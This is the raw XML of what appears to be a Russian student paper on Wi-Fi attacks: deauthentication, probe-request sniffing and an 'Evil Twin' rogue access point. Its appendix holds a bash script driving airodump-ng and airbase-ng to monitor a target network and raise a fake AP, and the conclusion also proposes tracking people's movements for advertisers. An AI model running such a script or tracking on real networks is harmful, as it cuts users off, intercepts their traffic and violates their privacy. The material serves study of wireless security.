        <w:spacing w:after="57" w:before="57"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4075" cy="2781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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340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422">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Широковещательная рассылка пакетов deauth может использоваться для отключения расположенных вблизи устройств с целью перехвата повторно отправляемых ими Probes Requests на подключение. Такие пакеты могут быть перехвачены любыми доступными снифферами, такими как Wireshark или tcpdump. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000423">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Зная мак-адреса пользователя и точки доступа, можно аналогично тому, как было показано ранее, осуществить деаунтификацию конкретного устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000424">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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6120130" cy="1774825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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0130" cy="1774825"/>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используя функциональность скрипта, можно получить данные близлежащих устройств, осуществить мониторинг конкретной точки доступа и выполнить деаунтификацию с целью проведению дальнейшего вектора атак. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000426">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1fob9te" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Заключение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000427">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работы поставленная нами цель была достигнута. Реализованное программное обеспечение позволяет перехватывать, анализировать трафик, проводить соответствующие атаки, подменять точки доступа и отключать пользователей от них. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000428">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Потенциальная опасность такого рода программного обеспечения достаточно велика, однако его наглядная реализация позволяет глубже понять возможные векторы планирования злоумышленника и в случае необходимости действовать на предупреждение возможного вреда. Все перехваченные в процессе работы данные принадлежат нам и носят лишь информативный характер. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000429">
      <w:pPr>
        <w:spacing w:after="57" w:before="57"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Одним из возможных способов применения системы мониторинга Probe Request запросов является отслеживание активности пользователей в определенных местах. Это может быть полезно как рекламным компаниям для обработки результатов и предоставления более актуальной в соответствии с интересами пользователя рекламы, так и в других отраслях, отслеживающих перемещение пользователей (к примеру, криминалистика).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Литература</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042A">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How we tracked and analyzed over 200,000 people`s footsteps at MIT. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.freecodecamp.org/news/tracking-analyzing-over-200-000-peoples-every-step-at-mit-e736a507ddbf/</w:t>
        </w:r>
      </w:hyperlink>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42B">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Perils of Probe Requests. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@brannondorsey/wi-fi-is-broken-3f6054210fa5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042C">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CWAP 802.11- Probe Request/Response. [Электронный ресурс]. – Электрон. дан. – Режим доступа : </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://mrncciew.com/2014/10/27/cwap-802-11-probe-requestresponse/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042D">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Airmon-ng. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.aircrack-ng.org/doku.php?id=airmon-ng</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042E">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Counting wireless devices on a Raspberry Pi with tcpdump. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://frdmtoplay.com/counting-wireless-devices-on-a-raspberry-pi-with-tcpdump/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042F">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Деаутентификация клиентов беспроводной сети в Kali Linux. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://hackware.ru/?p=74</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000430">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Deauthentication. [Электронный ресурс]. – Электрон. дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.aircrack-ng.org/doku.php?id=deauthentication</w:t>
        </w:r>
      </w:hyperlink>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431">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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evil Twin [Электронный ресурс] – Электрон дан. – Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://null-byte.wonderhowto.com/news/evil-twin-part-3-full-bash-script-0166207/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000432">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:space="0" w:sz="0" w:val="nil"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:space="0" w:sz="0" w:val="nil"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:jc w:val="both"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating an Evil Twin or Fake Access Point on Your Home Network Using Aircrack-ng and Dnsmasq [Электронный ресурс] – Электро дан. – Режим доступа: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://thecybersecurityman.com/2018/08/11/pentest-edition-creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-dnsmasq-part-1-setup/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000433">
      <w:pPr>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434">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3dy6vkm" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Приложение 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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Код программы, реализующей все указанные в работе функции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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3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#####Authors: Alexand Melnikov, Alexey Sysoev, Sergei Puzan################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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#####Nicknames: Doctor D. Ildo, Turtle Titan, Brokendick Counterstrike#####</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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3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option0(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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"Enter your monitor mode interface (wlan1mon): "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043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4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option1(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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sudo airodump-ng $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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wait</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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4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option2(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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bssid=''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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while [ -z $bssid ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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"Enter the BSSID: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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read bssid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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channel=''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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while [ -z $channel ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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"Enter the Channel: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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read channel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044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"Write File Prefix: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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writeFilePrefix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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-z $writeFilePrefix ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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"No Write File Specified"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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writeFile=" -w $writeFilePrefix"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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5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sudo airodump-ng --bssid $bssid -c $channel $writeFile $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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wait</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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5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option3(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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options3=''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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"Evil Twin ESSID: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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etEssid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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-z $etEssid ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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"ESSID not set"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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options3="$options3 --essid $etEssid"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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6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"Evil Twin BSSID[optional]: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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etBssid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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-z $etBssid ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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"BSSID not set"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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options3="$options3 -a $etBssid"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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6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"Enter the Channel: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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etChannel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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-z $etChannel ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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"Channel not set"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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options3="$options3 -c $etChannel"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046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7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"Enter the host MAC(client connected to target AP)[optional]: "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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etHost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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-z $etHost ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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"Host MAC not set"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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options3="$options3 -h $etHost"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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7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"Enter any other options (refer to man airbase-ng...)[optional]:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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otherOptions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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-z $otherOptions ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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"No other options set"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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options3="$options3 $otherOptions"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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7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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047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"Killing Airbase-ng..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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pkill airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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"Killing DHCP..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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pkill dhcpd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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$options3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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"Starting Fake AP..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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sudo airbase-ng $options3 $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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"Initiating at0 interface"</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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ifconfig at0 up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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ifconfig at0 10.0.0.1 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048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route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1</w:t>
